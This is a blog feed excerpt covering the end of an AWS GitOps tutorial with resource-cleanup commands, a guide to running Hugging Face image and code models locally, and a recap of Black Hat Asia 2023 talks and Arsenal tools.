<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693038254450/8384f548-89f1-41dd-bb76-875191d2c7e2.png" alt class="image--center mx-auto" /></p>
<p>If you are interested more, you can look at CloudWatch logs for Lambda output, EventBridge, etc.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693045620394/8681f197-41f8-4a10-9114-ff85620e97f2.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-delete-resources">Delete resources</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Delete terraform resources</span>
terraform destroy

<span class="hljs-comment"># Delete all images in the ECR repository</span>
aws ecr batch-delete-image --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span> --image-ids <span class="hljs-string">"<span class="hljs-subst">$(aws ecr list-images --region ${TF_VAR_REGION} --repository-name ${TF_VAR_ECR_REPO_NAME} --query 'imageIds[*]' --output json)</span>"</span>

<span class="hljs-comment"># Delete ECR repository</span>
aws ecr delete-repository --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693046198714/15a52ae0-8850-4f20-a787-ed6c6ee5061d.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-further-enhancements">Further enhancements</h3>
<p>So far, we made sure any changes on the AWS IAM are synchronized with GitHub. Once we have all the data on GitHub, we can code GitHub Actions to sync its policies with AWS IAM on cloud side to complete pure GitOps approach.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>In conclusion, we've walked you through a hands-on project that employs a range of AWS services, including Lambda, EventBridge, CloudTrail, CloudWatch, ECR, and S3, all orchestrated through Terraform, Docker &amp; AWS CLI. This guide serves as a robust starting point for anyone new to AWS, offering a practical way to gain hands-on experience. As you continue your journey in cloud computing, remember that the principles of GitOps can be applied far beyond IAM, serving as a foundational approach to cloud infrastructure management.</p>
]]></content:encoded></item><item><title><![CDATA[Securing Your Data With Local AI Model Execution: A Guide Using Hugging Face]]></title><description><![CDATA[In the ever-evolving landscape of artificial intelligence (AI), the potential for data breaches and leaks has become an alarming concern. Recent incidents involving AI tools like OpenAI's ChatGPT have sparked debates over data privacy and security. T...]]></description><link>https://blog.rewanthtammana.com/securing-your-data-with-local-ai-model-execution-a-guide-using-hugging-face</link><guid isPermaLink="true">https://blog.rewanthtammana.com/securing-your-data-with-local-ai-model-execution-a-guide-using-hugging-face</guid><category><![CDATA[AI]]></category><category><![CDATA[chatgpt]]></category><category><![CDATA[data privacy]]></category><category><![CDATA[#cybersecurity]]></category><category><![CDATA[huggingface]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 21 Jun 2023 12:45:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1687259522025/f13d27a8-d2e5-4d12-ad8f-ee45a5b70f55.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In the ever-evolving landscape of artificial intelligence (AI), the potential for data breaches and leaks has become an alarming concern. Recent incidents involving AI tools like OpenAI's ChatGPT have sparked debates over data privacy and security. These tools, while powerful, can inadvertently lead to the exposure of sensitive data if not used judiciously. For example, <a target="_blank" href="https://codeandhack.com/samsung-corporate-data-leaked-due-to-chatgpt/">Samsung Electronics experienced a data leak</a> when employees used ChatGPT to optimize their workflow, inadvertently causing confidential data to enter the chatbot's database.</p>
<p>Similarly, Apple and other major companies have <a target="_blank" href="https://www.theverge.com/2023/5/19/23729619/apple-bans-chatgpt-openai-fears-data-leak">restricted the use of AI tools</a> due to <a target="_blank" href="https://www.axios.com/2023/03/10/chatgpt-ai-cybersecurity-secrets">fears of confidential information being leaked or collected</a>. As AI continues to permeate various sectors, it's crucial to prioritize data security and privacy.</p>
<p>One effective strategy to balance these needs is running AI models locally, which is the central focus of this guide. But wait, training models locally require high computational power, resources &amp; expertise. This guide explores how to run pre-trained models from Hugging Face on local systems without incurring massive costs.</p>
<h3 id="heading-the-power-of-local-ai-getting-started"><strong>The Power of Local AI: Getting Started</strong></h3>
<p>Let's start with something simple, like generating images from a given text.</p>
<p>I loved this research paper on <a target="_blank" href="https://arxiv.org/abs/2207.12598">Classifier Free Diffusion Guidance</a> from Jonathan Ho. Although the proposed theory sounds promising, reproducing it can be challenging. I'm not interested in spending huge money for an experiment or sheer curiosity.</p>
<p>With the enormous sources and data on the internet, I started exploring to find an existing model to run on a local system.</p>
<p>Navigating many resources, I stumbled across <a target="_blank" href="https://huggingface.co/">Hugging Face</a>, an AI model hub with over <code>231,836</code> models (as of this writing) and a vibrant, active community.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687076229829/15ce306d-63fb-432d-8605-7b9c2a589654.png" alt class="image--center mx-auto" /></p>
<p>Using Hugging Face's robust search features, you can quickly locate models based on research paper citations. As a result, you can find a model built based on Jonathan Ho's research, ready for local execution. The above research paper, <a target="_blank" href="https://arxiv.org/abs/2207.12598">Classifier Free Diffusion Guidance</a>, is cited as <a target="_blank" href="https://arxiv.org/abs/2207.12598">arXiv:2207.12598</a>. Many models are built based on this research paper, but I don't know which one to pick. As a regular user, I liked the one with the highest rating.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687075948491/56c7aca9-1ae4-40db-9085-018050ca790e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-hands-on-guide-to-local-ai-execution"><strong>Hands-On Guide to Local AI Execution</strong></h3>
<p>Let's look at how you can use this model for image generation. The following Python script shows how to set up a stable diffusion pipeline and generate images locally using the pre-compiled model, <a target="_blank" href="https://huggingface.co/runwayml/stable-diffusion-v1-5"><code>runwayml/stable-diffusion-v1-5</code></a>.</p>
<p>I'm on an M1 laptop &amp; it supports <em>mps</em> device type at runtime. Use whatever is supported on your system.</p>
<pre><code class="lang-python"><span class="hljs-keyword">from</span> diffusers <span class="hljs-keyword">import</span> DiffusionPipeline

pipeline = DiffusionPipeline.from_pretrained(<span class="hljs-string">"runwayml/stable-diffusion-v1-5"</span>)
pipeline = pipeline.to(<span class="hljs-string">"mps"</span>) <span class="hljs-comment"># cpu, cuda, mkldnn, opengl, opencl, ideep, hip, ve, fpga, ort, xla, lazy, vulkan, mps, meta, hpu, mtia, privateuseone</span>

<span class="hljs-comment"># Recommended if you have 8/16 GB RAM</span>
pipeline.enable_attention_slicing()

prompt = <span class="hljs-string">"a photo of an astronaut riding a horse on mars"</span>

<span class="hljs-comment"># Initialize the setup</span>
_ = pipeline(prompt,num_inference_steps=<span class="hljs-number">1</span>)

<span class="hljs-comment"># Generate images</span>
images = pipeline(prompt).images
<span class="hljs-keyword">for</span> index, image <span class="hljs-keyword">in</span> enumerate(images):
    image.save(<span class="hljs-string">"image{0}.jpg"</span>.format(index))
</code></pre>
<p>The generated image is as follows:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687152257986/14b9b2a6-3175-4b3a-8329-76b1689dc63b.jpeg" alt class="image--center mx-auto" /></p>
<h3 id="heading-unleashing-the-power-of-stable-diffusion-web-ui"><strong>Unleashing the power of Stable Diffusion Web UI</strong></h3>
<p>To make this process even more accessible and customizable, let's leverage <a target="_blank" href="https://github.com/AUTOMATIC1111/stable-diffusion-webui">Stable Diffusion Web UI</a>. This user-friendly interface allows you to adjust numerous parameters effortlessly. Here are step-by-step instructions on setting up and using the UI:</p>
<ol>
<li><p>Clone stable diffusion repository</p>
<pre><code class="lang-bash"> git <span class="hljs-built_in">clone</span> https://github.com/AUTOMATIC1111/stable-diffusion-webui.git
 <span class="hljs-built_in">cd</span> stable-diffusion-webui
</code></pre>
</li>
<li><p>Start a virtual environment to ensure we aren't messing with other packages.</p>
<pre><code class="lang-bash"> python3 -m virtualenv --python=<span class="hljs-string">"<span class="hljs-subst">$(command -v python3)</span>"</span> .env
 <span class="hljs-built_in">source</span> .env/bin/activate
</code></pre>
</li>
<li><p>Install required packages</p>
<pre><code class="lang-python"> pip install transformers==<span class="hljs-number">4.19</span><span class="hljs-number">.2</span> diffusers invisible-watermark
 pip install -r requirements.txt
</code></pre>
</li>
<li><p>On the model page, you can see the "files and versions" section that contains different pre-compiled files for this specific model.</p>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687079075115/903195b1-1e32-4929-8fa0-e7d46423b7e8.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>I've downloaded both models seen in the screenshot above. To get started, download the <code>v1-5-pruned-emaonly</code> compiled model, as it's smaller. The files are with the <code>ckpt</code> extension; it's a checkpoint file (likely compiled by Pytorch)</p>
<pre><code class="lang-bash"> <span class="hljs-built_in">cd</span> models/Stable-diffusion
 wget https://huggingface.co/runwayml/stable-diffusion-v1-5/resolve/main/v1-5-pruned-emaonly.ckpt
</code></pre>
</li>
<li><p>The WebUI provides a script to start a quick instance on a local port. It checks &amp; installs missing packages, if any.</p>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687079274013/4504c099-4c40-4f98-968e-6ba3a8474936.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>There is so much information in the output &amp; finally, it runs on a local port, <code>7860</code>.</p>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687079403721/c2948dc1-554c-4d76-a01b-5193f1b62ca7.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>The default configuration is in <code>configs/v1-inference.yaml</code>. We don't have to change them in this blog, showing the contents for reference. Feel free to modify them &amp; play around.</p>
<pre><code class="lang-yaml"> <span class="hljs-attr">model:</span>
   <span class="hljs-attr">base_learning_rate:</span> <span class="hljs-number">1.0e-04</span>
   <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.models.diffusion.ddpm.LatentDiffusion</span>
   <span class="hljs-attr">params:</span>
     <span class="hljs-attr">linear_start:</span> <span class="hljs-number">0.00085</span>
     <span class="hljs-attr">linear_end:</span> <span class="hljs-number">0.0120</span>
     <span class="hljs-attr">num_timesteps_cond:</span> <span class="hljs-number">1</span>
     <span class="hljs-attr">log_every_t:</span> <span class="hljs-number">200</span>
     <span class="hljs-attr">timesteps:</span> <span class="hljs-number">1000</span>
     <span class="hljs-attr">first_stage_key:</span> <span class="hljs-string">"jpg"</span>
     <span class="hljs-attr">cond_stage_key:</span> <span class="hljs-string">"txt"</span>
     <span class="hljs-attr">image_size:</span> <span class="hljs-number">64</span>
     <span class="hljs-attr">channels:</span> <span class="hljs-number">4</span>
     <span class="hljs-attr">cond_stage_trainable:</span> <span class="hljs-literal">false</span>   <span class="hljs-comment"># <span class="hljs-doctag">Note:</span> different from the one we trained before</span>
     <span class="hljs-attr">conditioning_key:</span> <span class="hljs-string">crossattn</span>
     <span class="hljs-attr">monitor:</span> <span class="hljs-string">val/loss_simple_ema</span>
     <span class="hljs-attr">scale_factor:</span> <span class="hljs-number">0.18215</span>
     <span class="hljs-attr">use_ema:</span> <span class="hljs-literal">False</span>

     <span class="hljs-attr">scheduler_config:</span> <span class="hljs-comment"># 10000 warmup steps</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.lr_scheduler.LambdaLinearScheduler</span>
       <span class="hljs-attr">params:</span>
         <span class="hljs-attr">warm_up_steps:</span> [ <span class="hljs-number">10000</span> ]
         <span class="hljs-attr">cycle_lengths:</span> [ <span class="hljs-number">10000000000000</span> ] <span class="hljs-comment"># incredibly large number to prevent corner cases</span>
         <span class="hljs-attr">f_start:</span> [ <span class="hljs-number">1.e-6</span> ]
         <span class="hljs-attr">f_max:</span> [ <span class="hljs-number">1</span><span class="hljs-string">.</span> ]
         <span class="hljs-attr">f_min:</span> [ <span class="hljs-number">1</span><span class="hljs-string">.</span> ]

     <span class="hljs-attr">unet_config:</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.modules.diffusionmodules.openaimodel.UNetModel</span>
       <span class="hljs-attr">params:</span>
         <span class="hljs-attr">image_size:</span> <span class="hljs-number">32</span> <span class="hljs-comment"># unused</span>
         <span class="hljs-attr">in_channels:</span> <span class="hljs-number">4</span>
         <span class="hljs-attr">out_channels:</span> <span class="hljs-number">4</span>
         <span class="hljs-attr">model_channels:</span> <span class="hljs-number">320</span>
         <span class="hljs-attr">attention_resolutions:</span> [ <span class="hljs-number">4</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span> ]
         <span class="hljs-attr">num_res_blocks:</span> <span class="hljs-number">2</span>
         <span class="hljs-attr">channel_mult:</span> [ <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">4</span>, <span class="hljs-number">4</span> ]
         <span class="hljs-attr">num_heads:</span> <span class="hljs-number">8</span>
         <span class="hljs-attr">use_spatial_transformer:</span> <span class="hljs-literal">True</span>
         <span class="hljs-attr">transformer_depth:</span> <span class="hljs-number">1</span>
         <span class="hljs-attr">context_dim:</span> <span class="hljs-number">768</span>
         <span class="hljs-attr">use_checkpoint:</span> <span class="hljs-literal">True</span>
         <span class="hljs-attr">legacy:</span> <span class="hljs-literal">False</span>

     <span class="hljs-attr">first_stage_config:</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.models.autoencoder.AutoencoderKL</span>
       <span class="hljs-attr">params:</span>
         <span class="hljs-attr">embed_dim:</span> <span class="hljs-number">4</span>
         <span class="hljs-attr">monitor:</span> <span class="hljs-string">val/rec_loss</span>
         <span class="hljs-attr">ddconfig:</span>
           <span class="hljs-attr">double_z:</span> <span class="hljs-literal">true</span>
           <span class="hljs-attr">z_channels:</span> <span class="hljs-number">4</span>
           <span class="hljs-attr">resolution:</span> <span class="hljs-number">256</span>
           <span class="hljs-attr">in_channels:</span> <span class="hljs-number">3</span>
           <span class="hljs-attr">out_ch:</span> <span class="hljs-number">3</span>
           <span class="hljs-attr">ch:</span> <span class="hljs-number">128</span>
           <span class="hljs-attr">ch_mult:</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">1</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">2</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">4</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">4</span>
           <span class="hljs-attr">num_res_blocks:</span> <span class="hljs-number">2</span>
           <span class="hljs-attr">attn_resolutions:</span> []
           <span class="hljs-attr">dropout:</span> <span class="hljs-number">0.0</span>
         <span class="hljs-attr">lossconfig:</span>
           <span class="hljs-attr">target:</span> <span class="hljs-string">torch.nn.Identity</span>

     <span class="hljs-attr">cond_stage_config:</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.modules.encoders.modules.FrozenCLIPEmbedder</span>
</code></pre>
</li>
<li><p>Let's access the application in a web browser, <a target="_blank" href="http://127.0.0.1:7860/">http://127.0.0.1:7860/</a></p>
</li>
<li><p>I've given a prompt, <code>astronaut eating food</code> &amp; below is the generated image.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687156476754/397d5c42-454b-4800-bc63-53260637365f.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>Increasing the batch size will generate multiple images &amp; there are numerous other configurable variables.</p>
</li>
</ol>
<h3 id="heading-demystifying-ai-image-generation"><strong>Demystifying AI Image Generation</strong></h3>
<p>You may be wondering how the model creates these images from text prompts. The Stable Diffusion Web UI provides an "interrogate clip" feature to demystify this process. This tool allows you to probe how a model interprets an image, and you can then modify the generated interpretation to create new images.</p>
<p>The below image got generated with a prompt, <code>astronaut sitting on a horse</code>. I loaded the generated image in the <code>img2img</code> feature and clicked the interrogate button.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687156771385/4eaa02da-6fc1-4f63-911c-98df82f79a67.png" alt class="image--center mx-auto" /></p>
<p>Now, we know what kind of prompt generates this image. For instance, the output generated by the "interrogate clip" interprets a component of the given picture as a red sky. Let's change that to "blue sky" and regenerate the image.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687157217711/b9192df8-2cbc-45cb-8cb8-4b1caf32dee1.png" alt class="image--center mx-auto" /></p>
<p>Tweaking the parameters of an image is fun. Let's try changing the "astronaut" to a man in "tuxedo" &amp; see what it generates.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687157419547/b21cd813-980e-4e81-8fa3-62ca5e94a091.png" alt class="image--center mx-auto" /></p>
<p>The above process helps to decode &amp; understand how a model interprets a given image in text format &amp; helps us to write appropriate prompts to generate desired pictures.</p>
<h3 id="heading-going-beyond-images-code-generation-with-ai"><strong>Going Beyond Images: Code Generation with AI</strong></h3>
<p>While image generation is exciting, what about code generation? On Hugging Face, a separate category called <a target="_blank" href="https://huggingface.co/models?other=custom_code"><em>custom_code</em></a> offers models for generating and interpreting custom code. One such model is <a target="_blank" href="https://huggingface.co/bigcode/santacoder"><code>bigcode/santacoder</code></a>, which auto-fills Python code similarly to GitHub Copilot but operates locally.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687158271623/9e3505fe-c4a6-41fc-98c6-02def20bcf3d.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-python"><span class="hljs-comment"># pip install -q transformers</span>
<span class="hljs-keyword">from</span> transformers <span class="hljs-keyword">import</span> AutoModelForCausalLM, AutoTokenizer

checkpoint = <span class="hljs-string">"bigcode/santacoder"</span>
device = <span class="hljs-string">"cuda"</span> <span class="hljs-comment"># for GPU usage or "cpu" for CPU usage</span>

tokenizer = AutoTokenizer.from_pretrained(checkpoint)
model = AutoModelForCausalLM.from_pretrained(checkpoint, trust_remote_code=<span class="hljs-literal">True</span>).to(device)

inputs = tokenizer.encode(<span class="hljs-string">"def print_hello_world():"</span>, return_tensors=<span class="hljs-string">"pt"</span>).to(device)
outputs = model.generate(inputs)
print(tokenizer.decode(outputs[<span class="hljs-number">0</span>]))
</code></pre>
<p>The generated output is as follows:</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">print_hello_world</span>():</span>
    print(<span class="hljs-string">"Hello World!"</span>)
</code></pre>
<h3 id="heading-the-possibilities-are-endless"><strong>The possibilities are endless</strong></h3>
<p>The exploration doesn't stop at code autofill. You'll find models that generate code from textual input, detect errors in your code, and even suggest security improvements.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>This guide has highlighted the importance of data security in the AI landscape and the power of local AI execution. Leveraging AI is an integral part of technological evolution and workflow optimization. However, it's equally essential to maintain data security and privacy. Thus, running AI models on local systems provides an excellent solution to balance efficiency and data protection.</p>
<p>In an ever-evolving technological landscape, local AI execution using platforms like Hugging Face ensures we remain at the forefront of AI advancements while prioritizing data security. So, gear up and experiment with AI locally - the possibilities are endless!</p>
<h3 id="heading-references">References</h3>
<ul>
<li><p><a target="_blank" href="https://huggingface.co/">Hugging face</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/AUTOMATIC1111/stable-diffusion-webui">Stable Diffusion WebUI</a></p>
</li>
<li><p><a target="_blank" href="https://codeandhack.com/samsung-corporate-data-leaked-due-to-chatgpt/">Samsung data leak</a></p>
</li>
<li><p><a target="_blank" href="https://www.theverge.com/2023/5/19/23729619/apple-bans-chatgpt-openai-fears-data-leak">Apple bans ChatGPT</a></p>
</li>
<li><p><a target="_blank" href="https://www.axios.com/2023/03/10/chatgpt-ai-cybersecurity-secrets">Corporates' data security fear due to ChatGPT</a></p>
</li>
<li><p><a target="_blank" href="https://arxiv.org/abs/2207.12598">Classifier Free Diffusion Guidance</a></p>
</li>
<li><p><a target="_blank" href="https://huggingface.co/bigcode/santacoder">bigcode/santacoder model</a></p>
</li>
<li><p><a target="_blank" href="https://huggingface.co/runwayml/stable-diffusion-v1-5">runwayml/stable-diffusion-v1-5 model</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Reflections on Black Hat Asia 2023: Learning, Networking, and Inspiration]]></title><description><![CDATA[Black Hat Asia 2023, held in the vibrant city of Singapore, surpassed all expectations as it brought together cybersecurity professionals from across the globe. This prestigious event served as a hub for knowledge sharing, networking opportunities, a...]]></description><link>https://blog.rewanthtammana.com/reflections-on-black-hat-asia-2023-learning-networking-and-inspiration</link><guid isPermaLink="true">https://blog.rewanthtammana.com/reflections-on-black-hat-asia-2023-learning-networking-and-inspiration</guid><category><![CDATA[Security]]></category><category><![CDATA[conference]]></category><category><![CDATA[research]]></category><category><![CDATA[networking]]></category><category><![CDATA[trends]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Thu, 18 May 2023 10:37:18 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1684405367495/69f9d2b0-7e6e-45bf-b984-29f63222aa44.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Black Hat Asia 2023, held in the vibrant city of Singapore, surpassed all expectations as it brought together cybersecurity professionals from across the globe. This prestigious event served as a hub for knowledge sharing, networking opportunities, and an abundance of inspiration, leaving attendees empowered and enlightened.</p>
<p>At Black Hat Asia 2023, I had the chance to demonstrate our tool, <a target="_blank" href="https://github.com/rewanthtammana/Damn-Vulnerable-Bank">Damn Vulnerable Bank</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684400947826/3b04deaf-f11a-49d3-ad4a-0089751acc17.png" alt="Damn Vulnerable Bank" /></p>
<p>The entire arsenal of presenters!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684408769843/fd2fc865-c05a-4d68-9f3e-81034688c7ca.jpeg" alt class="image--center mx-auto" /></p>
<p>The conference featured an extensive lineup of captivating sessions that showcased the forefront of cybersecurity advancements. Among the standout presentations, Xiaosheng Tan's keynote address addressed the pressing importance of data security, shedding light on emerging laws and regulations shaping the landscape. Notably, Tan emphasized the significance of Privacy Enhanced Computing (PEC) and its potential impact on the industry.</p>
<p>Another noteworthy session was "Automated Bots as Threat Actors," which delved into the integration of machine learning (ML) and artificial intelligence (AI) in the realm of security. Attendees were captivated by the discussion on leveraging ML and AI to detect patterns, identify attacks, and combat the increasing sophistication of threat actors.</p>
<p>During the event, attention was drawn to the Darknet's "Bots as a Service (BaaS)" offering, revealing the underground economy that fuels cybercrime. The exposure of tools like <a target="_blank" href="https://github.com/openbullet/OpenBullet2">OpenBullet2</a> and the exploration of various language models such as GPT-3, GPT-4, LaMDA, BLOOM, XLNet, GPT-Neo, Ernie 3.0 Titan, Minerva, and LLaMA opened new possibilities in areas like credential stuffing attacks and TTP extraction using ML models.</p>
<p>A fascinating topic that garnered significant interest was knowledge graph construction and semantic web-building techniques, which showcased innovative approaches to extract insights and understand the complex relationships between entities in the cyber landscape. The integration of LLM (Large Language Models) in cyber security proved to be a game-changer, unveiling new avenues for threat identification and malware detection.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683883829374/c114d647-8ffd-4090-98fc-4d822d911aa0.jpeg" alt="Knowledge Graph Construction" /></p>
<p>Among the engaging sessions, the discussion on User Entity Behavior Analytics (UEBA) captured attention, showcasing its effectiveness in identifying suspicious behavioral patterns and aiding in detecting shoulder surfing attacks and malware infiltrations.</p>
<p>Throughout the conference, attendees were exposed to groundbreaking research and revelations. One particularly enthralling presentation explored the methods employed by criminals to compromise millions of mobile devices. The investigation unveiled intricate implant delivery and management systems, shedding light on the dark underbelly of compromised ROMs and their suspicious DEX files.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884859214/764f8a19-3069-46ec-844e-b5e28506c813.jpeg" alt="Compromised Mobile Devices" /></p>
<p>ROM compromise trends over the years.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884845946/a6aeea51-3c17-43f2-95ad-776a76481bbe.jpeg" alt /></p>
<p>The hackers behind these operations proved to be highly organized, establishing an elaborate network of operations and multiple business entities. Astonishingly, the group boasted the accomplishment of having 8.9 million active devices under their control at one point, displaying their audacious activities on their branded website.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684216350644/79196976-2d1f-4398-962c-e327b9b82bbe.jpeg" alt="Criminal Network" /></p>
<p>Furthermore, the conference shed light on the exploitation of internal undocumented services within AWS and Azure. The insightful presentation uncovered vulnerabilities in AWS Glue services, revealing jar files that contained information about unexposed services. The session also explored the hacking of managed data services, providing attendees with valuable insights into potential weaknesses in these cloud platforms.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684216611200/81c4d5ce-ff58-44f8-b442-c6c2ad0f5f93.jpeg" alt="AWS and Azure Exploitation" /></p>
<p>A high-level overview of AWS services Glue hack.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684216709423/538cf08a-99cb-480f-ad19-2835f0768f89.jpeg" alt /></p>
<p>Another captivating talk focused on the exploitation of isolation in WPA3, exposing the vulnerabilities to deauthentication and sleep attacks. The session provided a deeper understanding of the intricacies of wireless security protocols, emphasizing the need for robust defenses against emerging threats.</p>
<h2 id="heading-showcasing-the-arsenal-of-innovation">Showcasing the Arsenal of Innovation</h2>
<p>The Black Hat Asia 2023 Arsenal exhibited a diverse range of cutting-edge tools and frameworks that captured the imagination of attendees. Some notable highlights included:</p>
<ul>
<li><p><a target="_blank" href="http://aadinternals.com">AADInternals</a>: An Azure AD and M365 hacking and administration toolkit.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#purplesharp-automated-adversary-simulation-31336">Purplesharp</a>: An automated adversary simulation tool designed for Windows environments.</p>
</li>
<li><p><a target="_blank" href="https://github.com/namhyung/uftrace">uftrace</a>: A dynamic function tracing tool for C/C++/Rust programs.</p>
</li>
<li><p><a target="_blank" href="https://github.com/j3ssie/osmedeus">Osmedeus</a>: An all-in-one reconnaissance framework for building personalized reconnaissance systems.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#bluemap---an-interactive-tool-for-azure-exploitation-30899">Bluemap</a>: An interactive tool tailored for Azure exploitation, enabling thorough assessments of Azure environments.</p>
</li>
<li><p><a target="_blank" href="https://github.com/yogeshojha/rengine">rengine</a>: An automated reconnaissance framework designed to gather information and identify potential vulnerabilities.</p>
</li>
<li><p><a target="_blank" href="https://github.com/secureworks/squarephish">squarephish</a>: An advanced phishing tool that combines the OAuth Device code authentication flow with QR codes for highly effective phishing attacks.</p>
</li>
<li><p><a target="_blank" href="https://github.com/ine-labs/ThreatSeeker">Threatseeker</a>: A threat-hunting tool that utilizes Windows event logs for comprehensive analysis and detection.</p>
</li>
<li><p><a target="_blank" href="https://github.com/BeichenDream/GodPotato">GodPotato</a>: A tool capable of escalating privileges using the ImpersonatePrivilege permission.</p>
</li>
<li><p><a target="_blank" href="https://github.com/gojek/CureIAM">CureIAM</a>: A solution designed to streamline the cleanup of over-permissioned IAM accounts in Google Cloud Platform (GCP) infrastructures.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#poc-attack-against-flying-drone-31236">PoC against flying drone</a>: A proof-of-concept demonstration showcasing an attack against a flying drone.</p>
</li>
<li><p><a target="_blank" href="https://github.com/ytisf/PyExfil">PyExfil</a>: A Python package that enables data exfiltration from compromised systems.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#faceless---deepfake-detection-31316">Faceless</a>: A deepfake detection tool, vital for combating the rise of synthetic media.</p>
</li>
</ul>
<h2 id="heading-empowering-cybersecurity-with-language-models">Empowering Cybersecurity with Language Models</h2>
<p>The conference also underscored the significant role of Language Models (LMs) in the realm of cybersecurity. LMs like GPT-3, GPT-4, LaMDA, BLOOM, XLNet, GPT-Neo, Ernie 3.0 Titan, Minerva, and LLaMA were recognized for their potential in various applications, including credential stuffing attacks and the extraction of Techniques, Tactics, and Procedures (TTPs) using ML models.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884484152/4d52006f-1c17-43fe-9ad4-d443ebc2b17b.jpeg" alt="LLMs in Cybersecurity" /></p>
<p>Behavioral analysis using User Entity Behavior Analytics (UEBA) was another area where LMs showcased their effectiveness, enabling the identification of malware attacks and anomalous user behavior. This breakthrough technology offered promising solutions for safeguarding digital ecosystems from evolving threats.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884746214/b231c6c5-81d4-457c-9365-9bb0d578a242.jpeg" alt="Behavioral Analysis with LLM" /></p>
<p>The powerful Network Operations Center (NOC) at Black Hat Asia 2023 demonstrated the vast amount of metrics collected to monitor and analyze network activity. These metrics provided invaluable insights into identifying potential security breaches and ensuring the continuous protection of critical infrastructure.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884390507/80957312-fdfa-4efc-b262-d48600fdd13b.jpeg" alt="Black Hat NOC" /></p>
<p>Some hideous hands-on sessions on RFID hacking, lock picking, deep fake detections &amp; lot more. I picked up a few locks 😉</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684409045167/e4a85e46-452c-4a61-ad08-0011a518541b.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>In conclusion, Black Hat Asia 2023 was an exceptional event that brought together cybersecurity professionals from around the globe. Attendees were treated to captivating presentations, enlightening discussions, and access to a diverse range of innovative tools and frameworks.</p>
